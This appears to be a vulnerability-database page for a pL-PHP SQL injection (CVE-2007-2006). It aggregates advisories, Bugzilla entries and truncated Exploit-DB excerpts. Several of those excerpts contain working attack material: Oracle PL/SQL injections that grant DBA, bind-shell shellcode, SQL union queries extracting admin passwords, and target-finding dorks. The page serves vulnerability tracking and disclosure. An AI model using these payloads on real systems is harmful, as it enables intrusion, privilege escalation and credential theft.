CVE-2007-2006
published 2007-04-12
CVE-2007-2006: Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass…
Priority: P3 · 42 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.03% (59.3rd percentile)
Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpmailer | phpmailer | >= 0 < 5.2.0 | 5.2.0 |
| pl-php | pl-php | <= 0.9_beta | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | — | 7.5 | HIGH | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |
Source: GHSA · 2024-02-02 · CVSS 7.5
CVE-2006-5734 [HIGH] PHPMailer Local file inclusion
### Impact
Arbitrary local file inclusion via the `$lang` property, remotely exploitable if the host application passes unfiltered user data into that property. The three CVEs listed are for applications that used PHPMailer and were vulnerable to this problem.
### Patches
It's not known exactly when this was fixed in the host applications, but it was fixed in PHPMailer 5.2.0.
### Workarounds
Filter and validate user-supplied data before use.
### References
https://nvd.nist.gov/vuln/detail/CVE-2006-5734
https://nvd.nist.gov/vuln/detail/CVE-2007-3215
https://nvd.nist.gov/vuln/detail/CVE-2007-2021
Example exploit: https://www.exploit-db.com/exploits/14893
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the
Source: GHSA (unreviewed) · 2022-05-01
CVE-2007-2006 [HIGH] GHSA-h78v-7wxx-7wmv: Multiple SQL injection vulnerabilities in login
Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass parameter.
Source: Red Hat · 2008-10-27 · CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Source: Red Hat · 2007-02-01 · CVSS 5.0
CVE-2007-0458 [MEDIUM] Multiple Wireshark issues (CVE-2007-0457, CVE-2007-0458, CVE-2007-0459)
Unspecified vulnerability in the HTTP dissector in Wireshark (formerly Ethereal) 0.99.3 and 0.99.4 allows remote attackers to cause a denial of service (application crash) via unspecified vectors, a different issue than CVE-2006-5468.
Source: Red Hat · CVSS 4.6
CVE-2007-0905 [MEDIUM] php session extension safe_mode/open_basedir bypass
PHP before 5.2.1 allows attackers to bypass safe_mode and open_basedir restrictions via unspecified vectors in the session extension. NOTE: it is possible that this issue is a duplicate of CVE-2006-6383.
Statement: We do not consider these to be security issues. For more details see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and https://www.php.net/security-note.php
No detection rules found.
Source: Exploit-DB · 2011-06-13 · CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Source: Exploit-DB · 2009-12-26
CVE-2007-3061 CactuShop 6.0 - Database Disclosure
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
/_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[+] ~ Note : Forever RevengeHack.Com
[+] CactuShop v6 Database Disclosure Vulnerability
[+] Script: [ CactuShop v6 ]
[+] Language: [ ASP ]
[+] Download: [ http://www.aspindir.com/Goster/3114]
[+] Founder: [ LionTurk - [email protected] }
[+] My Home: [ RevengeHack.com ]
[+] N0T3 : Wait for my new exploits
###########################################################################
===[ Exploit And Dork ]===
[+] http://[target].com/[path]/database/cactushop6.mdb
[+] CactuShop v6 ASP Shopping Cart ©1999-2006 Cactusoft International FZ-LLC & Cactusoft Ltd. All rights reserved.
[+
Source: Exploit-DB · 2008-11-15
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
---
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= Script: clipShare Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= script:http://www.clip-sha
Source: Exploit-DB · 2008-01-06
CVE-2006-1260 Horde Web-Mail 3.x - 'go.php' Remote File Disclosure
---
----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]
Horde Web-Mail Remote File Disclosure
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
At first look , this code is not vulnerable and we can only read remote files.
But parse_url is only a set of regular expressions and we can use nullbyte to deceive functi
Source: Exploit-DB · 2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Source: Exploit-DB · 2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Source: Exploit-DB · 2007-08-28
CVE-2007-4604 DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
---
#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;
if ($res !~ /n
Source: Exploit-DB · 2007-07-26
CVE-2007-3927 IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
---
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
Source: Exploit-DB · 2007-06-08
CVE-2007-3157 SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service
---
/* safenet-dos.c
*
* SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS (win32)
* by John Anderson
* mu-b
* - Mar 2006 - June 2007
*
* - Tested on: SafeNet HighAssurance Remote 1.4.0 (Build 12) (win32)
*
* Kernel level (Ring0) DoS in IPv6 support of IPSecDrv.sys
* (causes an infinite loop in searching option headers 0x1000BEB0).
*
* This POC only works on a local subnet since it sends an invalid packet
* and any sensible router will drop it. However, this is exploitable
* remotely with IPv6.
*/
#include
#include
#include
#include
#include
#include
#include
#define IPV4_HDR_LEN 20
#define IPV6_HDR_LEN 40
#define UDP_LEN 16
struct opt
{
u_char nxt_hdr;
u_char opt_len;
};
unsigned long int
lookup (char *hostnam
Source: Exploit-DB · 2007-05-04
CVE-2007-1669 ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)
---
/*
Exploit for the vulnerability:
Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-Sébastien Guay-Leroux
September 2006
*/
#include
#include
#include
// Structure of a ZOO header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_N
Source: Exploit-DB · 2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Source: Exploit-DB · 2007-03-30
CVE-2007-1795 JC URLShrink 1.3.1 - Remote Code Execution
---
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+ /*************************__I N F O__**************************\
+ |* *|
+ |* U R L S H R I N K *|
+ |* *|
+ |* Portal: Urlshrink *|
+ |* Version: 1.3.1 *|
+ |* Release: 26-07-2006 *|
+ |* www: www.developers.jccorp.net *|
+ |* Author: Dj7xpl | [email protected] *|
+ |* *|
+ \**************************************************************/
+_______________________________________________________________________________________________________________________+
+
Source: Exploit-DB · 2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] and contributors (see www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// display of the details for an author
require_once($base_path.'/includes/templates
Source: Exploit-DB · 2007-02-23
CVE-2006-0549 Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: https://www.securityfocus.com/bid/16287
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line
Source: Exploit-DB · 2007-02-22
CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Source: Exploit-DB · 2007-02-18
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0
Source: Exploit-DB · 2007-01-23
CVE-2006-3698 Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
select *
from user_role_privs
;
// milw0rm.com [2007-01-23]
Source: Exploit-DB · 2007-01-23
CVE-2006-0586 Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := 'OWNER';
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';
v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/
// milw0rm.com [2007-01-23]
Source: Exploit-DB · 2007-01-05
CVE-2007-0117 Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
---
#!/usr/bin/ruby
# (c) 2006 LMH (code from the other exploit, porting)
# Kevin Finisterre (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.
require 'fileutils'
EVIL_COMMANDS = [
"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
"echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\
Source: Exploit-DB · 2007-01-03
CVE-2007-0059 Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
---
#!/usr/bin/ruby
#
# (c) 2006 LMH
# Original scripting and POC by Aviv Raff (http://aviv.raffon.net).
#
# Description:
# Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the
# fake FTP server (required). HTTP server port can be modified but it's
# not recommended. Adjust as necessary.
#
# see http://projects.info-pull.com/moab/MOAB-03-01-2007.html
require 'socket'
require 'fileutils'
require 'webrick'
trap 0, proc {
puts "-- Terminating: #{$$}"
}
REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname
REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath)
TARGET_SCRIPT = "on error resume next\r\n" +
"Set c = CreateObject(\"ADODB.Connection\")\r\n
Source: Exploit-DB · 2007-01-03
CVE-2007-0129 LocazoList 2.01a beta5 - 'subcatID' SQL Injection
---
# Title : LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.locazo.net:81
# Dork : "Powered by Locazolist Copyright © 2006"
# $$ : $100
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//main.asp?catid=1&subcatID=[SQL]
Example:
//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-03]
Source: Exploit-DB · 2006-11-16
CVE-2006-6952 Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation
---
// source: https://www.securityfocus.com/bid/21140/info
Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities.
An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers.
These issues affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior.
////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
//// Kmxfw.sys
//// Kernel Privilege Esca
Source: Bugzilla · 2008-10-29 · CVSS 6.8
CVE-2008-4775 [MEDIUM] phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Source: Bugzilla · 2008-03-20 · CVSS 2.6
CVE-2008-1373 [LOW] cups: overflow in gif image filter
It was discovered that the GIF parsing code used by the CUPS printing system is affected by a similar issue to the GIF parsers used by gd / netpbm / tk / SDL_image. The value of code_size read from a GIF image is not properly validated before being used to initialize the table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to: CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554 (netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to the fix used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Source: Bugzilla · 2008-03-07 · CVSS 2.1
CVE-2007-4850 [LOW] php: curl safe mode bypass
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4850
curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows context-dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files via a file:// request containing a \x00 sequence, a different vulnerability than CVE-2006-2563.
Based on change logs, upstream fix is http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/interface.c?r1=1.62.2.14.2.33&r2=1.62.2.14.2.34&view=patch
Discussion:
NVD statement regarding this flaw and php packages shipped in Red Hat Enterprise Linux and Red Hat Application Stack is available on the url also mentioned in the initial comment - http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4850:
Official Statement from Red Hat (1
Source: Bugzilla · 2008-02-05 · CVSS 2.6
CVE-2008-0553 [LOW] tk: GIF handling buffer overflow
tk GIF handling code is based on the same code as used by gd and SDL_image and is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697. The ReadImage function in tkImgGIF.c does not properly check the initialCodeSize value read from the GIF image before using it as an upper bound during the initialization of the append array. This can result in a stack buffer overflow.
Upstream fix: http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues: CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses embedded copy of tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Source: Bugzilla · 2007-12-04 · CVSS 4.3
CVE-2007-6203 [MEDIUM] httpd: Garbage before HTTP method name is not escaped in a reply in case of erroneous request
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6203 to the following vulnerability:
Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
References:
http://www.securityfocus.com/archive/1/archive/1/484410/100/0/threaded
http://procheckup.com/Vulnerability_PR07-37.php
http://www.securityf
Source: Bugzilla · 2007-11-15 · CVSS 6.8
CVE-2007-5977 [MEDIUM] XSS in db_create
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5977 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in db_create.php in phpMyAdmin before 2.11.2.1 allows remote authenticated users with CREATE DATABASE privileges to inject arbitrary web script or HTML via a hex-encoded IMG element in the db parameter in a POST request, a different vulnerability than CVE-2006-6942.
References:
http://www.digitrustgroup.com/advisories/tdg-advisory071108a.html
http://sourceforge.net/project/shownotes.php?release_id=553333
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2007-7
http://www.frsirt.com/english/advisories/2007/3824
http://secunia.com/advisories/27630
http://xforce.iss.net/xforce/xfdb/38404
Discussion:
d
Source: Bugzilla · 2007-09-13 · CVSS 4.9
CVE-2006-4538 [MEDIUM] kernel: Local DoS with corrupted ELF
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of service via a malformed ELF file and then triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in following products:
Red Hat Linux Enterprise 2.1
Red Hat Linux Enterprise 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
Source: Bugzilla · 2007-07-10 · CVSS 6.8
CVE-2006-4519 [MEDIUM] GIMP multiple image loader integer overflows
iDefense has reported several integer overflow flaws in GIMP. It is presumed that these flaws could lead to arbitrary code execution if a victim opens a malicious image file.
Discussion:
Reproducers for some of the problems can be found in one of the corresponding upstream bugs: http://bugzilla.gnome.org/show_bug.cgi?id=453973
---
This was addressed via:
Red Hat Enterprise Linux version 2.1 (RHSA-2007:0513)
Red Hat Enterprise Linux version 3 (RHSA-2007:0513)
Red Hat Enterprise Linux version 4 (RHSA-2007:0513)
Red Hat Enterprise Linux version 5 (RHSA-2007:0513)
Bugzilla
CVE-2006-7203 oops in compat_sys_mount() when data pointer is NULL
bugzilla·2007-05-11·CVSS 4.0
CVE-2006-7203 [MEDIUM] CVE-2006-7203 oops in compat_sys_mount() when data pointer is NULL
OpenVZ/Virtuozzo linux kernel team has discovered the following issue on the
latest RHEL5 kernel:
An unprivileged user is able to crash the node by running a 32-bit "mount -t smbfs ..."
Issue was fixed in mainstream:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=822191a2fa1584a29c3224ab328507adcaeac1ab
[test@dhcp0-43 tmp]$ uname -a
Linux dhcp0-43.sw.ru 2.6.18-8.1.3.el5 #1 SMP Mon Apr 16 15:54:14 EDT 2007 x86_64
x86_64 x86_64 GNU/Linux
[test@dhcp0-43 tmp]$ id
uid=502(test) gid=502(test) groups=502(test)
[test@dhcp0-43 tmp]$ file /tmp/mount
/tmp/mount: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for
GNU/Linux 2.2.5, dynamically linked (uses shared libs), for GNU/Linux
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
